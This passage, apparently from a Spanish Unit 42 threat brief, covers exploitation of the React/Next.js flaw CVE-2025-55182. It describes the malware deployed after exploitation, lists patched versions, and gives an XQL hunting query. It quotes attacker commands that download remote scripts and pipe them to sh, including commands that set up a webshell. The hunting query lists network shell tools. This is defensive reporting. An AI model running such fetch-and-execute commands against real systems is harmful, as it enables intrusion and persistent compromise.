monospace;\">rsyslo<\/span>.<\/p>\n<p>La carga \u00fatil parece ser un agente de Cobalt Strike que fue creado usando CrossC2, una herramienta de extensi\u00f3n para crear Cobalt Strike Beacon para SO Linux. La Figura 3 muestra el proceso en Cortex XDR.<\/p>\n<figure id=\"attachment_168521\" aria-describedby=\"caption-attachment-168521\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168521 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-645796-167647-3.png\" alt=\"\u00c1rbol de procesos de Cortex XDR para la implementaci\u00f3n de malware. La captura de pantalla muestra dos rutas de archivo en ramas de ejecuci\u00f3n separadas. La ruta est\u00e1 marcada con iconos de s\u00edmbolos de advertencia, que muestran el flujo del ataque.\" width=\"1000\" height=\"410\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-645796-167647-3.png 1555w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-645796-167647-3-786x322.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-645796-167647-3-768x315.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-645796-167647-3-1536x630.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-168521\" class=\"wp-caption-text\">Figura 3. Flujo de ataque del despliegue de Cobalt Strike.<\/figcaption><\/figure>\n<p>La Figura 4 muestra c\u00f3mo se ve la alerta para actividad de Cobalt Strike en Cortex XDR.<\/p>\n<figure id=\"attachment_167837\" aria-describedby=\"caption-attachment-167837\" style=\"width: 464px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-167837 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4.png\" alt=\"Captura de pantalla de la alerta de Cortex XDR. Se ha ocultado parte de la informaci\u00f3n. Se bloquea la ejecuci\u00f3n de un archivo binario descargado y la alerta se clasifica como malware. \" width=\"464\" height=\"613\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4.png 464w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4-333x440.png 333w\" sizes=\"(max-width: 464px) 100vw, 464px\" \/><figcaption id=\"caption-attachment-167837\" class=\"wp-caption-text\">Figura 4. Alerta de Cortex XDR para actividad de Cobalt Strike.<\/figcaption><\/figure>\n<h3><a id=\"post-167647-_3clc5la4f9oj\"><\/a><strong>Actividad de Webshell<\/strong><\/h3>\n<p>Observamos la instalaci\u00f3n de una webshell interactiva disfrazada como un Administrador de Archivos de React (<span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.google.com\/search?q=https:\/\/fm.js\/\" target=\"_blank\" rel=\"noopener\">fm.js<\/a><\/span>) recuperada directamente de<a href=\"https:\/\/raw.githubusercontent.com\/laolierzi-commits\/phpbd\/refs\/heads\/main\/rjs\/filemanager-standalone.js\" target=\"_blank\" rel=\"noopener\"> GitHub<\/a> que permite la navegaci\u00f3n de directorios para recolectar archivos de configuraci\u00f3n sensibles, como contrase\u00f1as de bases de datos y claves API, mientras facilita la exfiltraci\u00f3n de datos a trav\u00e9s de una funci\u00f3n de descarga incorporada para robar c\u00f3digo fuente o datos de clientes.<\/p>\n<p>La herramienta soporta compromiso persistente al permitir la carga de backdoors adicionales o rootkits, y otorga la capacidad de infligir da\u00f1o irreversible a trav\u00e9s de la eliminaci\u00f3n masiva de archivos y la ejecuci\u00f3n directa de comandos del sistema.<\/p>\n<p>El actor inici\u00f3 la secuencia terminando preventivamente los procesos de nodo existentes para eliminar conflictos de puertos, seguido de una validaci\u00f3n de ejecuci\u00f3n para confirmar la ejecuci\u00f3n de c\u00f3digo arbitrario. El script prepara una carga \u00fatil de webshell Node.js en el directorio <span style=\"font-family: 'courier new', courier, monospace;\">\/tmp<\/span>. Emplea adaptaci\u00f3n de red heur\u00edstica modificando iterativamente la configuraci\u00f3n para rotar a trav\u00e9s de varios puertos de escucha, intentando eludir las pol\u00edticas locales de firewall.<\/p>\n<p>El ataque concluye estableciendo persistencia ef\u00edmera v\u00eda <span style=\"font-family: 'courier new', courier, monospace;\">nohup<\/span> y desplegando artefactos de verificaci\u00f3n \u00fanicos (<span style=\"font-family: 'courier new', courier, monospace;\">segawon.txt<\/span>) en directorios web comunes, permitiendo validaci\u00f3n externa del compromiso y mapeo de la estructura de archivos del servidor.<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c cd \/tmp &amp;&amp; nohup node fm.js &gt; \/dev\/null 2&gt;&amp;1 &amp; sleep 2,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 13373\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 3000\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 8080\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 8888\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 9000\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; wget -q -O fm.js https:\/\/raw.githubusercontent.com\/laolierzi-commits\/phpbd\/refs\/heads\/main\/rjs\/filemanager-standalone.js 2&gt;&amp;1 &amp;&amp; wc -c fm.js,\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo 'segawon.id' &gt; \/app\/public\/segawon.txt &amp;&amp; chmod 644 \/app\/public\/segawon.txt,\/bin\/sh -c echo 'segawon.id' &gt; \/app\/web\/public\/segawon.txt &amp;&amp; chmod 644 \/app\/web\/public\/segawon.txt,\/bin\/sh -c echo 'segawon.id' &gt; \/var\/www\/html\/segawon.txt &amp;&amp; chmod 644 \/var\/www\/html\/segawon.txt,\/bin\/sh -c id,\/bin\/sh -c killall -9 node 2&gt;\/dev\/null,\/bin\/sh -c ls -la<\/pre>\n<h3><a id=\"post-167647-_zamyf389ng2a\"><\/a><span style=\"font-weight: 400;\">EtherRAT<\/span><\/h3>\n<p>La Unidad 42 ha observado actividad compatible con EtherRAT, que realiza las siguientes acciones:<\/p>\n<ul>\n<li>Aprovecha los contratos inteligentes de Ethereum para la resoluci\u00f3n C2.<\/li>\n<li>Utiliza m\u00faltiples mecanismos de persistencia independientes de Linux.<\/li>\n<li>Descarga su propio tiempo de ejecuci\u00f3n de <a href=\"https:\/\/nodejs.org\" target=\"_blank\" rel=\"noopener\">Node.js<\/a> desde nodejs.org.<\/li>\n<\/ul>\n<p>El actor de amenazas de la DPRK, UNC5342,<a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-adopts-etherhiding\" target=\"_blank\" rel=\"noopener\"> seg\u00fan se informa est\u00e1 usando EtherHiding<\/a> para entregar malware y facilitar el robo de criptomonedas.<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo while :; do (curl -sL http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o .\/s.sh 2&gt;\/dev\/null || wget -qO .\/s.sh http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2&gt;\/dev\/null || python3 -c \"import urllib.request as u;open('.\/s.sh','wb').write(u.urlopen('http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh').read())\") &amp;&amp; [ -s .\/s.sh ] &amp;&amp; chmod +x .\/s.sh &amp;&amp; .\/s.sh &amp;&amp; break; sleep 300; done<\/pre>\n<h3>Noodle RAT<\/h3>\n<p>Unit 42 observ\u00f3 el despliegue de <a href=\"https:\/\/www.virustotal.com\/gui\/file\/33641bfbbdd5a9cd2320c61f65fe446a2226d8a48e3bd3c29e8f916f0592575f\" target=\"_blank\" rel=\"noopener\">Noodle RAT<\/a>, un backdoor confirmado por tener versiones tanto para Windows como para Linux y sospechoso de ser usado por grupos de habla china involucrados en espionaje o cibercrimen.<\/p>\n<pre class=\"lang:default decode:true\">hxxp:\/\/146.88.129[.]138:5511\/443nb64\r\n\r\ntcp:\/\/vip[.]kof97.lol:443\r\n\r\n192.238.202[.]17<\/pre>\n<h3><a id=\"post-167647-_8f28qfybyy9u\"><\/a><strong>Auto-color<\/strong><\/h3>\n<p>Unit 42 ha observado m\u00faltiples instancias de un Backdoor<a href=\"https:\/\/unit42.paloaltonetworks.com\/new-linux-backdoor-auto-color\/\" target=\"_blank\" rel=\"noopener\"> Auto-color<\/a> previamente no visto a trav\u00e9s de m\u00faltiples entornos, malware que publicamos originalmente en febrero de 2025. El nombre de archivo asociado con este backdoor, <span style=\"font-family: 'courier new', courier, monospace;\">pamssod<\/span>, se hace pasar por la biblioteca leg\u00edtima del M\u00f3dulo de Autenticaci\u00f3n Conectable (PAM).<\/p>\n<p>Se observ\u00f3 Auto-color en los siguientes momentos y lugares:<\/p>\n<ul>\n<li>A principios de 2025, dirigido a universidades y organizaciones gubernamentales de Asia y Norteam\u00e9rica.<\/li>\n<li>En abril de 2025, en la red de una empresa qu\u00edmica con sede en EE. UU.<\/li>\n<li>En agosto de 2025, en la explotaci\u00f3n de <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-31324\" target=\"_blank\" rel=\"noopener\">CVE\u20112025\u201131324<\/a>.<\/li>\n<\/ul>\n<h3><a id=\"post-167647-_3y78w69c6f4a\"><\/a><strong>Actividad de CL-STA-1015<\/strong><\/h3>\n<p><span style=\"font-weight: 400;\">Unit 42 observ\u00f3 actividad de amenazas de post-explotaci\u00f3n que evaluamos con alta confianza como consistente con un cl\u00faster de actividad que rastreamos como <\/span>CL-STA-1015<span style=\"font-weight: 400;\">. Este actor de amenazas fue evaluado con confianza media como un Intermediario de Acceso Inicial (<\/span><i><span style=\"font-weight: 400;\">Initial Access Broker<\/span><\/i><span style=\"font-weight: 400;\">) patrocinado por el estado chino, seg\u00fan el Google Threat Intelligence Group.<\/span><\/p>\n<p>Los atacantes ejecutaron un comando para recuperar y ejecutar inmediatamente una carga \u00fatil de script de shell malicioso etiquetado como <span style=\"font-family: 'courier new', courier, monospace;\">slt<\/span> desde un servidor remoto C2. Consistente con actividad vista previamente, los atacantes emplearon una l\u00f3gica a prueba de fallos usando el operador <span style=\"font-family: 'courier new', courier, monospace;\">OR<\/span>:<\/p>\n<ul>\n<li>El sistema primero intenta la descarga usando <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> con banderas optimizadas para sigilo (<span style=\"font-family: 'courier new', courier, monospace;\">-fsSL<\/span> para suprimir la salida y seguir redirecciones) y resiliencia (<span style=\"font-family: 'courier new', courier, monospace;\">-m180<\/span> para prevenir bloqueos).<\/li>\n<li>Si curl no est\u00e1 disponible o falla, recurre autom\u00e1ticamente a <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> con par\u00e1metros similares de silencio y tiempo de espera.<\/li>\n<li>El comando concluye canalizando el contenido descargado directamente en <span style=\"font-family: 'courier new', courier, monospace;\">sh<\/span>, permitiendo la ejecuci\u00f3n sin archivos donde el script malicioso corre inmediatamente en memoria sin necesariamente escribir un archivo persistente en el disco.<\/li>\n<\/ul>\n<p>El comando desarmado para esto es:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c (curl -fsSL -m180 hxxp[:]\/\/115.42.60[.]223:61236\/slt||wget -T180 -q hsxp[:]\/\/115.42.60[.]223:61236\/slt)|sh<\/pre>\n<p>Siguiendo el comando anterior, observamos la creaci\u00f3n exitosa de dos archivos maliciosos en el sistema de archivos consistentes con SNOWLIGHT y determinamos a trav\u00e9s de an\u00e1lisis que la muestra de VShell a continuaci\u00f3n tambi\u00e9n resid\u00eda en el mismo servidor:<\/p>\n<ul>\n<li>Script bash de SNOWLIGHT: <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4\" target=\"_blank\" rel=\"noopener\">a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4<\/a><\/span><\/li>\n<li>SNOWLIGHT: <span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b0dc27f035ba1417990a21dafb361e083e4ed94a75a1c49dc45690ecf463de4a<\/span><\/li>\n<li>VShell: <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/4745703f395282a0687def2c7dcf82ed1683f3128bef1686bd74c966273ce1c5\" target=\"_blank\" rel=\"noopener\">4745703f395282a0687def2c7dcf82ed1683f3128bef1686bd74c966273ce1c5<\/a><\/span><\/li>\n<\/ul>\n<p>SNOWLIGHT es un dropper de malware sigiloso visto en la actividad de CL-STA-1015. Su funci\u00f3n principal es infiltrar un sistema Linux comprometido para luego descargar y ejecutar malware adicional y m\u00e1s poderoso. M\u00e1s notablemente, descarga el RAT VShell. VShell es<a href=\"https:\/\/www.sysdig.com\/blog\/unc5174-chinese-threat-actor-vshell\" target=\"_blank\" rel=\"noopener\"> popular entre cibercriminales de habla china<\/a> en varios foros, y su desarrollador principal es tambi\u00e9n un hablante de chino.<\/p>\n<h3><b>KSwapDoor<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Tras un an\u00e1lisis m\u00e1s detallado, Unit 42 ha descubierto que lo que previamente identificamos como BPFDoor, es de hecho un <\/span><i><span style=\"font-weight: 400;\">backdoor<\/span><\/i><span style=\"font-weight: 400;\"> de Linux nunca antes visto dirigido a servidores, al que llamamos <\/span>KSwapDoor<span style=\"font-weight: 400;\">. KSwapDoor implementa una sofisticada red de malla (<\/span><i><span style=\"font-weight: 400;\">mesh<\/span><\/i><span style=\"font-weight: 400;\">) P2P que permite el enrutamiento de m\u00faltiples saltos entre nodos infectados, utiliza cifrado AES-256-CFB con intercambio de claves Diffie-Hellman para las comunicaciones C2, e incluye c\u00f3digo de <\/span><i><span style=\"font-weight: 400;\">sniffer<\/span><\/i><span style=\"font-weight: 400;\"> de paquetes pasivo y latente para una potencial evasi\u00f3n de <\/span><i><span style=\"font-weight: 400;\">firewalls<\/span><\/i><span style=\"font-weight: 400;\">. Proporciona capacidades completas de acceso remoto, incluyendo <\/span><i><span style=\"font-weight: 400;\">shell<\/span><\/i><span style=\"font-weight: 400;\"> interactiva, ejecuci\u00f3n de comandos, operaciones de archivos y escaneo de movimiento lateral.<\/span><\/p>\n<p><b>Hallazgos Clave:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Sigilo y Enmascaramiento:<\/b><span style=\"font-weight: 400;\"> Tras su ejecuci\u00f3n, el binario se renombra a s\u00ed mismo como <\/span><span style=\"font-weight: 400;\">[<span style=\"font-family: 'courier new', courier, monospace;\">kswapd1<\/span>]<\/span><span style=\"font-weight: 400;\">, imitando un demonio de intercambio (<\/span><i><span style=\"font-weight: 400;\">swap<\/span><\/i><span style=\"font-weight: 400;\">) leg\u00edtimo del kernel de Linux. Se demoniza completamente mediante una doble bifurcaci\u00f3n (<\/span><i><span style=\"font-weight: 400;\">double-forking<\/span><\/i><span style=\"font-weight: 400;\">), creando una nueva sesi\u00f3n (<\/span><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">setsid()<\/span><span style=\"font-weight: 400;\">), y redirigiendo toda la E\/S est\u00e1ndar a <\/span><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">\/dev\/null<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Ofuscaci\u00f3n:<\/b><span style=\"font-weight: 400;\"> Casi todas las cadenas cr\u00edticas y los datos de configuraci\u00f3n est\u00e1n protegidos usando cifrado RC4. El <\/span><i><span style=\"font-weight: 400;\">malware<\/span><\/i><span style=\"font-weight: 400;\"> descifra estas cadenas en tiempo de ejecuci\u00f3n utilizando funciones de programaci\u00f3n de claves (<\/span><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">sub_410A41<\/span><span style=\"font-weight: 400;\"> y <\/span><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">sub_410B8D<\/span><span style=\"font-weight: 400;\">).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Persistencia y Configuraci\u00f3n:<\/b><span style=\"font-weight: 400;\"> Almacena su configuraci\u00f3n en un archivo cifrado con RC4 dentro del directorio <\/span><i><span style=\"font-weight: 400;\">home<\/span><\/i><span style=\"font-weight: 400;\"> del usuario. Durante la inicializaci\u00f3n, lee y descifra este archivo para localizar objetivos de Comando y Control (C2).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Resiliencia:<\/b><span style=\"font-weight: 400;\"> El <\/span><i><span style=\"font-weight: 400;\">malware<\/span><\/i><span style=\"font-weight: 400;\"> crea un bucle de vigilancia (<\/span><i><span style=\"font-weight: 400;\">watchdog<\/span><\/i><span style=\"font-weight: 400;\">) que genera y monitorea procesos secundarios, reinici\u00e1ndolos autom\u00e1ticamente si fallan. Tambi\u00e9n utiliza un directorio de preparaci\u00f3n (<\/span><i><span style=\"font-weight: 400;\">staging<\/span><\/i><span style=\"font-weight: 400;\">) en <\/span><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">\/tmp\/appInsight<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-167647-_t4ecrg50y2fm\"><\/a>Gu\u00eda Provisional<\/h2>\n<p>Acciones requeridas: La aplicaci\u00f3n inmediata de parches es la \u00fanica mitigaci\u00f3n definitiva.<\/p>\n<p>Los equipos de ingenier\u00eda y seguridad deben actualizar a las siguientes versiones reforzadas de inmediato:<\/p>\n<ul>\n<li>React: Actualizar a 19.0.1, 19.1.2 o 19.2.1<\/li>\n<li>Next.js: Actualizar a las \u00faltimas versiones estables con parche, incluyendo 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 o 15.0.5<\/li>\n<\/ul>\n<p>Para las \u00faltimas actualizaciones sobre esta vulnerabilidad, por favor consulte la documentaci\u00f3n proporcionada por el proveedor:<\/p>\n<ul>\n<li><a href=\"https:\/\/react.dev\/blog\/2025\/12\/03\/critical-security-vulnerability-in-react-server-components\" target=\"_blank\" rel=\"noopener\">CVE-2025-55182<\/a><\/li>\n<\/ul>\n<h2><a id=\"post-167647-_vvbgrp4qdg9t\"><\/a>Consultas de Threat Hunting Gestionado de Unit 42<\/h2>\n<p>El equipo de Threat Hunting Gestionado de Unit 42 contin\u00faa rastreando cualquier intento de explotar este CVE a trav\u00e9s de nuestros clientes, utilizando Cortex XDR y las consultas XQL a continuaci\u00f3n. Los clientes de Cortex XDR tambi\u00e9n pueden usar estas consultas XQL para buscar signos de explotaci\u00f3n.<\/p>\n<p>La siguiente consulta XQL ha sido utilizada para identificar exitosamente actividad post-compromiso. Durante el an\u00e1lisis, se identific\u00f3 un n\u00famero bajo de falsos positivos. Recomendamos revisar los procesos hijos generados por el proceso nodo. Busque operaciones de archivo sospechosas, operaciones de red, comandos de reconocimiento o ejecuci\u00f3n de c\u00f3digo, tales como los comandos observados anteriormente.<\/p>\n<pre class=\"lang:default decode:true\">\/\/ Description: This query attempts to identify possible node processes spawning two or more post-exploitation lolbins.\r\n\r\n\/\/ Notes: This has the potential to capture false-positives, it is recommended to investigate the children processes spawned by the node process and check for suspicious file operations, network operations, reconnaissance commands or code execution.\r\n\r\nconfig case_sensitive = false\r\n\r\n| preset=xdr_process\r\n\r\n| filter (actor_process_image_name in (\"node\",\"node.exe\", \"bun\", \"bun.exe\") and actor_process_command_line in (\"*react-dom*\", \"*.next*\", \"*node_modules\/next*\", \"*react-server*\", \"*next-server*\", \"*node server.js*\", \"*bin\/next*\", \"*--experimental-https*\", \"*app\/server*\", \"*.pnpm\/next*\", \"*next start*\", \"*next dev*\", \"*react-scripts start*\", \"*next\/dist\/server*\")) or (causality_actor_process_image_name in (\"node\",\"node.exe\", \"bun\", \"bun.exe\") and causality_actor_process_command_line in (\"*react-dom*\", \"*.next*\", \"*node_modules\/next*\", \"*react-server*\", \"*next-server*\", \"*node server.js*\", \"*bin\/next*\", \"*--experimental-https*\", \"*app\/server*\", \"*.pnpm\/next*\", \"*next start*\", \"*next dev*\", \"*react-scripts start*\", \"*next\/dist\/server*\"))\r\n\r\n| filter actor_process_command_line not in (\"*homebrew*\", \"*git config*\", \"*\/users*\", \"*\/usr*\", \"*\\users*\", \"*gcloud config*\", \"*git branch*\", \"*git describe*\") and action_process_image_command_line not in (\"*homebrew*\", \"*git config*\", \"*\/users*\", \"*\/usr*\", \"*\\users*\", \"*gcloud config*\", \"*git branch*\", \"*git describe*\") and causality_actor_process_command_line not in (\"*Microsoft VS Code*\", \"*iTerm2*\", \"*Visual Studio Code*\") and action_process_image_name not in (\"node\", \"node.exe\")\r\n\r\n| alter suspicious_processes = arraycreate(\"id\", \"curl\", \"wget\", \"whoami\", \"arp\", \"at.exe\", \"hostname\", \"nbstat.exe\", \"netsh.exe\", \"netstat.exe\", \"nslookup\", \"ping.exe\", \"query.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"traceroute.exe\", \"ipconfig.exe\", \"whoami.exe\", \"whois.exe\", \"quser.exe\", \"mshta.exe\", \"jscript.exe\", \"cscript.exe\", \"wscript.exe\", \"qwinsta.exe\", \"nltest.exe\", \"csvde.exe\", \"wevtutil.exe\", \"driverquery.exe\", \"nbtscan.exe\", \"ntdsutil.exe\", \"vssadmin.exe\", \"dsquery.exe\", \"adfind.exe\", \"klist.exe\", \"vssvc.exe\", \"nc\", \"ncat\", \"netcat\", \"base64\", \"uname\", \"dmidecode\", \"ip addr\", \"chmod -x\", \"chmod 7\", \"socat\", \"nohup\", \"setsid\", \"powershell.exe\", \"cmd.exe\", \"bash\", \"sh\", \"zsh\", \"mkfifo\", \"rundll32.exe\", \"java\", \"python\", \"python.exe\", \"php\", \"ifconfig\", \"net.exe\", \"net1.exe\", \"\/dev\/udp\", \"\/dev\/tcp\", \"adduser\", \"useradd\", \"lua\", \"crontab\", \"mknod\")\r\n\r\n| alter matches = arrayfilter(suspicious_processes , action_process_image_command_line contains \"@element\")\r\n\r\n| comp count_distinct(action_process_image_command_line) as num_procs, values(action_process_image_command_line) as action_process_image_command_line, values(causality_actor_process_command_line) as causality_actor_process_command_line by agent_hostname, actor_process_image_name, actor_process_command_line, action_process_image_name\r\n\r\n| filter num_procs &gt; 1<\/pre>\n<h2><a id=\"post-167647-_axcd0h6uu43\"><\/a>Conclusi\u00f3n<\/h2>\n<p>La explotaci\u00f3n inmediata y expansiva de esta vulnerabilidad resalta la velocidad a la que los actores de amenazas se mueven para aprovechar oportunidades. Si bien hemos notado actividad con nexo en China, la huella de la actividad abarcar\u00e1 cantidades significativas de motivaciones cibercriminales tambi\u00e9n.<\/p>\n<p>Espec\u00edficamente de nota, CL-STA-1015 (alias UNC5174) tiene un historial de explotaci\u00f3n r\u00e1pida de vulnerabilidades N-day:<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-1709\" target=\"_blank\" rel=\"noopener\">CVE-2024-1709<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2023-46747\" target=\"_blank\" rel=\"noopener\">CVE-2023-46747<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2023-22518\" target=\"_blank\" rel=\"noopener\">CVE-2023-22518<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2022-0185\" target=\"_blank\" rel=\"noopener\">CVE-2022-0185<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30525\" target=\"_blank\" rel=\"noopener\">CVE-2022-30525<\/a><\/li>\n<\/ul>\n<p>La distinci\u00f3n cr\u00edtica de esta vulnerabilidad es su naturaleza como un fallo l\u00f3gico determinista en el protocolo Flight, en lugar de un error probabil\u00edstico. A diferencia de errores de corrupci\u00f3n de memoria que pueden fallar, este fallo garantiza la ejecuci\u00f3n, transform\u00e1ndolo en una evasi\u00f3n confiable de todo el sistema para los atacantes. Amplificado por la huella masiva de Next.js en entornos empresariales, esto crea un conducto directo a datos internos sensibles.<\/p>\n<p>En \u00faltima instancia, este incidente subraya la fricci\u00f3n inherente entre el rendimiento y la seguridad en la arquitectura moderna. Mientras que React Server Components optimizan la obtenci\u00f3n de datos y la optimizaci\u00f3n para motores de b\u00fasqueda (SEO) moviendo la l\u00f3gica m\u00e1s cerca de la fuente, simult\u00e1neamente mueven la superficie de ataque m\u00e1s cerca de los datos m\u00e1s sensibles y valiosos de las organizaciones.<\/p>\n<p>Los clientes de Palo Alto Networks est\u00e1n mejor protegidos por nuestros productos, como se lista a continuaci\u00f3n. Actualizaremos este resumen de amenazas a medida que haya informaci\u00f3n m\u00e1s relevante disponible.<\/p>\n<h2><a id=\"post-167647-_kc9o74lyfgii\"><\/a>Protecciones de Productos de Palo Alto Networks para CVE-2025-55182<\/h2>\n<p>Los clientes de Palo Alto Networks pueden aprovechar una variedad de protecciones de productos y actualizaciones para identificar y defenderse contra esta amenaza.<\/p>\n<p>Si cree que podr\u00eda haber sido comprometido o tiene un asunto urgente, p\u00f3ngase en contacto con el<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\"> equipo de Respuesta a Incidentes de Unit 42<\/a> o llame al:<\/p>\n<ul>\n<li>Am\u00e9rica del Norte: L\u00ednea gratuita: +1 (866) 486-4842 (866.4.UNIT42)<\/li>\n<li>Reino Unido: +44.20.3743.3660<\/li>\n<li>Europa y Oriente Medio: +31.20.299.3130<\/li>\n<li>Asia: +65.6983.8730<\/li>\n<li>Jap\u00f3n: +81.50.1790.0200<\/li>\n<li>Australia: +61.2.4062.7950<\/li>\n<li>India: 000 800 050 45107<\/li>\n<li>Corea del Sur: +82.080.467.8774<\/li>\n<\/ul>\n<h3><a id=\"post-167647-_hg6rj9v28ruz\"><\/a><strong>Next-Generation Firewalls Con Advanced Threat Prevention<\/strong><\/h3>\n<p><a href=\"https:\/\/docs.paloaltonetworks.com\/ngfw\" target=\"_blank\" rel=\"noopener\">Next-Generation Firewall<\/a> con la suscripci\u00f3n de seguridad<a href=\"https:\/\/docs.paloaltonetworks.com\/advanced-threat-prevention\/administration\" target=\"_blank\" rel=\"noopener\"> Advanced Threat Prevention<\/a> puede ayudar a bloquear los ataques a trav\u00e9s de las siguientes firmas de Threat Prevention:<a href=\"https:\/\/www.google.com\/search?q=https:\/\/threatvault.paloaltonetworks.com\/%3Fq%3D96779\" target=\"_blank\" rel=\"noopener\"> 96779<\/a> y<a href=\"https:\/\/www.google.com\/search?q=https:\/\/threatvault.paloaltonetworks.com\/%3Fq%3D96780\" target=\"_blank\" rel=\"noopener\"> 96780<\/a>.<\/p>\n<h3><a id=\"post-167647-_rpj0xg1gcp1a\"><\/a><strong>Servicios de Seguridad Entregados en la Nube para el Next-Generation Firewall<\/strong><\/h3>\n<p><a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> y<a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\"> Advanced DNS Security<\/a> identifican dominios y URLs conocidos asociados con esta actividad como maliciosos.<\/p>\n<h3><a id=\"post-167647-_xza04o70xzdt\"><\/a><strong>Cortex XDR y XSIAM<\/strong><\/h3>\n<p>Los agentes de<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\"> Cortex XDR<\/a> y<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\"> XSIAM<\/a> ayudan a proteger contra actividades de post-explotaci\u00f3n utilizando el enfoque de protecci\u00f3n multicapa.<\/p>\n<p><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSOAR\">Cortex<\/a> ha lanzado un paquete de respuesta y playbook para<a href=\"https:\/\/www.google.com\/search?q=https:\/\/xsoar.pan.dev\/docs\/reference\/playbooks\/CVE-2025-55182_and_CVE-2025-66478_-_React_and_Next_js_Remote_Code_Execution\" target=\"_blank\" rel=\"noopener\"> CVE-2025-55182 (React) <\/a>y<a href=\"https:\/\/www.google.com\/search?q=https:\/\/xsoar.pan.dev\/docs\/reference\/playbooks\/CVE-2025-55182_and_CVE-2025-66478_-_React_and_Next_js_Remote_Code_Execution\" target=\"_blank\" rel=\"noopener\"> CVE-2025-66478 (Next.js)<\/a> para ayudar a automatizar y acelerar el proceso de mitigaci\u00f3n.<\/p>\n<p>Este playbook automatiza las siguientes tareas:<\/p>\n<ul>\n<li>Recolecci\u00f3n de indicadores del art\u00edculo de Unit 42<\/li>\n<li>Detecci\u00f3n de cualquier l\u00ednea de comando sospechosa indicativa de explotaci\u00f3n de estas vulnerabilidades v\u00eda una consulta XQL<\/li>\n<li>Investigaci\u00f3n de las l\u00edneas de comando para identificar indicadores maliciosos relacionados con las 